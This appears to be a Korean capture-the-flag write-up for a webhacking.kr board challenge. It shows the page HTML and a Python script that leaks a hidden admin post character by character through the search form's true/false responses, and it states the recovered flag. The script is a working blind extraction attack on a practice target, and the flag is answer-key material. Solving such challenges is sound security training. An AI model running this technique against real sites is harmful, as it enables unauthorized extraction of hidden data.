<html>
<head>
<title>Challenge 56</title>
</head>
<body>
<center>
<h2>B O A R D</h2>
<br><br>
<table border=1>
<tr><td>no</td><td>id</td><td>subject</td><td>secret</td></tr>
<tr><td>1</td><td>admin</td><td><a href=?read=admin>readme</a></td><td>1</td></tr>
<tr><td>2</td><td>guest</td><td><a href=?read=guest>hi~</a></td><td>0</td></tr>
</table>
<form method=post>search : <input name=search size=50 maxlength=50><input type=submit></form></body>
</html>
페이지 소스를 참고해 파이썬 코드를 짜면 아래와 같다.
import requests
import string
URL = 'https://webhacking.kr/challenge/web-33/'
TRUE_PHRASE = '<td>admin</td>'
def query(payload):
data = {'search': payload}
r = requests.post(URL, data=data)
content = r.text
return TRUE_PHRASE in content
# FLAG{himiko_toga_is_cute_dont_you_think_so?}
def find_flag():
flag = 'FLAG{'
while query(flag + '}') is False:
for character in string.printable:
if character == '%':
continue
elif query('{}{}'.format(flag, character)) is True:
flag += character
break
flag += '}'
print('flag: {}'.format(flag))
find_flag()
실행 결과, 플래그는 FLAG{himiko_toga_is_cute_dont_you_think_so?}이다.
